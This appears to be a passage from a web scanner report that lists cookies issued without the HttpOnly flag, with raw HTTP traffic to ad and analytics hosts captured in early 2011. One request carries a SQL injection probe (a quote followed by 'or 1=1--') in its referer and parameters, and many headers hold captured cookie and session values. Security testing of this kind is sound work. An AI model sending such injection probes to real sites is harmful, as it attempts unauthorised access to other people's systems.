POST /showcasehosted/resources/services/BasicService.svc/GetDemos HTTP/1.1 Host: blogs.silverlight.net Proxy-Connection: keep-alive Referer: http://blogs.silverlight.net/showcasehosted/ Origin: http://blogs.silverlight.net Content-Type: application/json; charset=UTF-8 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:00 GMT Content-Length: 0
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 772476 Content-Type: application/json; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:23:02 GMT; expires=Sun, 29-Jan-2012 23:23:02 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:23:05 GMT
{"d":[{"__type":"Demo:#SAW_WebService","demo_id":251,"location_id":840,"name":"Windows Vista Simulator","description":"The Windows Vista experience, simulated on the Web. Created as a demonstration o ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi=[CS]v1|26A2CE6E851D0395-6000012A402043A3[CE]; Expires=Fri, 29 Jan 2016 17:16:13 GMT; Domain=bonniercorp.122.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/timepopsci/1/H.14/s78723546345718?[AQB]&ndh=1&t=30/0/2011%2011%3A16%3A16%200%20360&ns=bonniercorp&pageName=popsci%7Cfront-page&g=http%3A//www.popsci.com/%3F172683569%27%2520or%25201%253d1--%2520%3D1&r=http%3A//burp/show/61&cc=USD&events=event2&v1=popsci%7Cfront-page&c17=http%3A//www.popsci.com/%3F172683569%27%2520or%25201%253d1--%2520%3D1&v17=http%3A//www.popsci.com/%3F172683569%27%2520or%25201%253d1--%2520%3D1&c21=Data%20Not%20Available&v21=Data%20Not%20Available&c22=Data%20Not%20Available&v22=Data%20Not%20Available&c23=Data%20Not%20Available&v23=Data%20Not%20Available&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1 Host: bonniercorp.122.2o7.net Proxy-Connection: keep-alive Referer: http://www.popsci.com/?172683569'%20or%201%3d1--%20=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 17:16:13 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|26A2CE6E851D0395-6000012A402043A3[CE]; Expires=Fri, 29 Jan 2016 17:16:13 GMT; Domain=bonniercorp.122.2o7.net; Path=/ Location: http://bonniercorp.122.2o7.net/b/ss/timepopsci/1/H.14/s78723546345718?AQB=1&pccr=true&vidn=26A2CE6E851D0395-6000012A402043A3&&ndh=1&t=30/0/2011%2011%3A16%3A16%200%20360&ns=bonniercorp&pageName=popsci%7Cfront-page&g=http%3A//www.popsci.com/%3F172683569%27%2520or%25201%253d1--%2520%3D1&r=http%3A//burp/show/61&cc=USD&events=event2&v1=popsci%7Cfront-page&c17=http%3A//www.popsci.com/%3F172683569%27%2520or%25201%253d1--%2520%3D1&v17=http%3A//www.popsci.com/%3F172683569%27%2520or%25201%253d1--%2520%3D1&c21=Data%20Not%20Available&v21=Data%20Not%20Available&c22=Data%20Not%20Available&v22=Data%20Not%20Available&c23=Data%20Not%20Available&v23=Data%20Not%20Available&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.3.1 Expires: Sat, 29 Jan 2011 17:16:13 GMT Last-Modified: Mon, 31 Jan 2011 17:16:13 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www282 Content-Length: 0 Content-Type: text/plain
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: boyle.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:05:03 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=9ff34bdc0b2e32fcc178bd49c46b26f9; expires=Sat, 25-Jan-2031 02:05:03 GMT; path=/; domain=.newsvine.com Content-Length: 0 Content-Type: text/html Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2117809&PluID=0&w=300&h=60&ord=35801428&ifrm=1&ncu=$$http://g.redacted/_2AD0003L/79000000000085282.1?!&&PID=7902678&UIT=G&TargetID=28253485&AN=35801428&PG=INVPC2&ASID=a610568226dd43348f3d9fefa630960e$$ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=f+JvabEk02WG00002h5iUabNA07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=8d80f2036804487297c74ec177b267a0&udc=true&rnd=1296343587672&RedC=c.redacted&MXFR=AD04D6F8B2FF44629973BD0674351135 HTTP/1.1 Accept: */* Referer: http://www.redacted/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: c.redcated Proxy-Connection: Keep-Alive
Response
HTTP/1.1 302 Redirect Cache-Control: private, no-cache, proxy-revalidate Pragma: no-cache Location: http://c.redacted/c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.redacted%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=8d80f2036804487297c74ec177b267a0&udc=true&rnd=1296343587672&MUID=AD04D6F8B2FF44629973BD0674351135 Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: MUID=AD04D6F8B2FF44629973BD0674351135; domain=.redcated; expires=Wed, 17-Aug-2011 23:26:33 GMT; path=/; Date: Sat, 29 Jan 2011 23:26:33 GMT Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c.gif?DI=15074 HTTP/1.1 Host: c.bing.com Proxy-Connection: keep-alive Referer: http://www.bing.com/videos/results.aspx Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=1; _FP=BDCE=129407839256968337&BDCEH=7BEF6608F1F2E27015D4037638CCD541; MUID=F741A5D3C8544F77A0B57D8439E7E06E; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c9874d115203d4525a6dc5f12136077f0; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=MS=1621031&D=1593447&AF=NOFORM; _SS=SID=4318D78D50E640FC90E674B1FECFA468&hIm=178
Response
HTTP/1.1 302 Redirect Cache-Control: private, no-cache, proxy-revalidate Pragma: no-cache Location: http://c.redcated/c.gif?DI=15074&RedC=c.bing.com&MXFR=F741A5D3C8544F77A0B57D8439E7E06E Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; domain=.bing.com; expires=Thu, 18-Aug-2011 17:11:11 GMT; path=/; Date: Sun, 30 Jan 2011 17:11:10 GMT Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t.php?sc_project=1890207&resolution=1920&h=1200&camefrom=http%3A//news.ycombinator.com/news&u=http%3A//informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual&t=Information%20Arbitrage%20-%20Start%20Fund%3A%20No%20big%20deal.%20Business%20as%20usual.&java=1&security=9e00f8ff&sc_random=0.31911576888523996&sc_snum=1&invisible=1 HTTP/1.1 Host: c.statcounter.com Proxy-Connection: keep-alive Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: is_unique=sc609958.1294848674.1-2495334.1296072601.0
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 14:47:53 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.10 P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR" Expires: Mon, 26 Jul 1997 05:00:00 GMT Set-Cookie: is_unique=sc609958.1294848674.1-2495334.1296072601.0-1890207.1296398873.0; expires=Fri, 29-Jan-2016 14:47:53 GMT; path=/; domain=.statcounter.com Content-Length: 49 Connection: close Content-Type: image/gif
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /calendar/calendar.aspx HTTP/1.1 Host: calendar.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353171&rver=6.1.6206.0&wp=MBI&wrep ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: careers.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Sun, 30 Jan 2011 02:06:11 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA49 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Location: http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home Set-Cookie: MC1=V=3&GUID=da39980442014ca6b9da39619943b989; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=8EDD00D637154D4B841C122EB598FF5B; domain=.redacted; expires=Thu, 18-Aug-2011 02:06:11 GMT; path=/ Cache-Control: no-cache Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /event/?type=-1&BTData=C02177F736E617E5C504A43B1BEBEA9AD95978492FFF7F6EFEAC5C2DEF029DB7&BT_PUB=2&BT_VEN=2331&BT_TRF=26638&r=[RANDOM] HTTP/1.1 Host: citi.bridgetrack.com Proxy-Connection: keep-alive Referer: http://redcated/NYC/iview/264935949/direct;;wi.300;hi.250/01?click= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CitiBT%5F9=; AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; ASB9=TX=1296270961&Pb=0&A=8&SID=3E5F37C0F6194C72A60362B4B4E88931&Vn=0&Ct=0&Pc=0&S=&Cn=194&Pd=8&T=38566&Cr=98231&W=40099&Tr=40099&Cp=4740&P=612428&B=9; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; ATV9=49137dTQ9L1c62c4K4cIM2Cccc2VTNc15L6cc1753c8c8cc1753ccccc
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Length: 43 Content-Type: image/GIF Expires: Sat, 29 Jan 2011 13:00:32 GMT Server: P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml" Set-Cookie: CitiBTSES=SID=3632A0E47C3A454A9ED45144B2EBD941; path=/ Set-Cookie: VCC9=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/ Set-Cookie: ATV9=57504dTQ9L1c62c4K4cIM2Cccc2VTNc15L6cc1753c8c8cc1753cccccdTU091cc4DEcOR16c2c28Rc2VJ6c14TAccQ0Eccccccccc; expires=Wed, 02-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Wed, 25-Jan-2012 05:00:00 GMT; path=/ Set-Cookie: ASB9=TX=1296392433&W=0&Tr=26638&Cp=4526&P=814118&B=9&T=37802&Cr=97894&S=0&Cn=0&Pd=0&SID=6A9811BEC51D4B829380A28CF78C1BE2&Vn=2331&Ct=0&Pc=0&Pb=2&A=0; expires=Wed, 02-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: CitiBT%5F9=; expires=Wed, 25-Jan-2012 05:00:00 GMT; path=/ Date: Sun, 30 Jan 2011 13:00:32 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /APM/go/139941180/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.meaningfulbeauty.com/?uci=US-MT-O-DI-MI-2906 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296353263-3972457; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=7E5205F6A748400B84AD01F34006AE37; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/285d4; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=b882065/285d4/10e4d581/bab9/4d44c7ef; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 02:07:43 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /APM/go/148848786/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://attuverseoffers.com/page4/index.html?1&source=ECbc0000000WIP00O&GUID=DA936173-6614-470C-8AAF-8DD52E3643E8 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296353265-3982025; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=5DEF820424F84B24B69D3D93ECECB25F; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=bce8f84/1a43a/11174245/bab9/4d44c7f1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 02:07:45 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BEL/go/262582811/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.sharebuilder.com/affiliates/?PC=sb&SID=520062934056594&MGDURL=Web%2Fwelcome%2Fwp%2Findex.htm&cmpid=10101414 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296353269-3932791; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=CE711711131C4C8D81F8D0F57B52D165; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/1c72; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=af8724c/1c72/fa6b21b/bab9/4d44c7f5; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 02:07:48 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /CNT/go/286609711/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://attuverseoffers.com/page4/index.html?1&source=ECbc0000000WIP00O&GUID=64701E1B-0B1A-4566-86D1-3CFA683F0759 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296353204-3934536; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=B03CF75FE18B4C4488D98A18A160243C; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=a0b6/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=bf2ec3a/1a43a/1115512f/a0b6/4d44c7b4; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 02:06:43 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /CNT/go/287065754/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.wireless.att.com/cell-phone-service/cell-phones/motorola.jsp?startFilter=false&feacondition=newphone&source=ECWD000000000000O P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296353207-3943143; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=3467FF0EC8A04BA6ADED05C9CB0F7837; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/25d1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=bab2264/25d1/111c469a/bab9/4d44c7b7; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 02:06:46 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /CNT/go/299297287/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://attuverseoffers.com/page4/index.html?1 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296344744-9189356; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=ADE9FC21333E46488D7A7ABFE892B219; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/1a43a; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=be75985/1a43a/11d6ea07/bab9/4d44a6a8; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sat, 29 Jan 2011 23:45:43 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /NFX/go/297941249/direct/01/ HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.netflix.com/opdply?mqso=80028841 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296344741-9183539; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=911C5A9886C74D1D85E6D49FC8A33620; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/1c4e; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=bf3b0a8/1c4e/11c23901/bab9/4d44a6a5; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sat, 29 Jan 2011 23:45:40 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ULA/go/296652509/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296350513-3979227; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=27C92A747D6B4A87B8366284DD8E4677; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/1b1dd; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=3cb5efe/1b1dd/11ae8edd/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 01:21:53 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /go/286026710/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.ishares.com/home.htm&c=MSN P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296350513-3980097; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=2652D8E3C448492EBAA5519D4E847438; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/1c5b3; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=4bd5098/1c5b3/110c6bd6/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 01:21:53 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /go/286609711/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
